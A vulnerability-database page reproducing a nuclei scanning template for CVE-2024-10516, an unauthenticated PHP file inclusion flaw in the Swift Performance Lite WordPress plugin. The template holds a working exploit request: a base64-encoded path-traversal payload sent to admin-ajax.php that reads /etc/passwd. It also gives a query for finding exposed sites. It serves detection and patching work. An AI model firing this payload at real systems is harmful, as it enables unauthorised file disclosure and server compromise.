Lucene search
K

Swift Performance Lite < 2.3.7.2 - Local PHP File Inclusion

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 39 Views

Vulnerability in Swift Performance Lite < 2.3.7.2 allows local PHP file inclusion and code execution.

Related
Refs
Code
id: CVE-2024-10516

info:
  name: Swift Performance Lite < 2.3.7.2 - Local PHP File Inclusion
  author: ritikchaddha
  severity: high
  description: |
    A vulnerability in Swift Performance Lite before version 2.3.7.2 allows unauthenticated attackers to perform local PHP file inclusion via the 'ajaxify' parameter. This can lead to arbitrary code execution on the server.
  impact: |
    Unauthenticated attackers can perform local PHP file inclusion via the ajaxify parameter to execute arbitrary code, potentially compromising the entire WordPress site.
  remediation: |
    Update Swift Performance Lite plugin to version 2.3.7.2 or later.
  reference:
    - https://github.com/RandomRobbieBF/CVE-2024-10516
    - https://nvd.nist.gov/vuln/detail/CVE-2024-10516
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-10516
    cwe-id: CWE-98
    epss-score: 0.06479
    epss-percentile: 0.92929
    cpe: cpe:2.3:a:swiftperformance:swift_performance_lite:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: swiftperformance
    product: swift_performance_lite
    fofa-query: body="/wp-content/plugins/swift-performance-lite"
  tags: cve,cve2024,wp,wp-plugin,wordpress,swift-performance,lfi,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "/wp-content/plugins/swift-performance-lite"
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=swift_performance_ajaxify&data=WyJ0ZW1wbGF0ZS1wYXJ0IiwibnVsbCIsIi4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2QiXQ==

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a004630440220307a0a736592341530ff154fcc56981cf9a45c99624a831cf1855bee8d187784022017d2116b227c6207213d3024f26c2820b0b3c9100c4475dd5b549599717efa24:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.8High risk
Vulners AI Score7.8
CVSS 3.18.1
EPSS0.06479
SSVC
39